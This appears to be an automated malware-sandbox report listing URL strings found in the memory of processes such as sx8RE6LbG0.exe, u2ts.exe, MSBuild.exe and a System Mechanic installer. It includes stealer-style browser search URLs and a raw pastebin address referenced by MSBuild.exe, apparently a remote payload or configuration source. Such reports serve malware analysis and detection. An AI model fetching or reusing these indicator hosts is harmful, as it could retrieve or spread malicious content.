Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000003.2668691750.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000003.2668691750.00000000024BB000.00000004.00001000.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u2ts.3.exe, 00000006.00000003.2668691750.00000000024E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000003.00000002.2168931630.000000000406D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.00000000050CA000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.0000000003862000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.00000000054D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u2ts.0.exe, u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627439691.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u2ts.3.exe, 00000006.00000003.2668691750.0000000002504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.0000021732450000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.0000021732450000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: freebl3.dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 0000001C.00000002.2878041510.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/0l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3317957401.0000021736452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.comrent
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
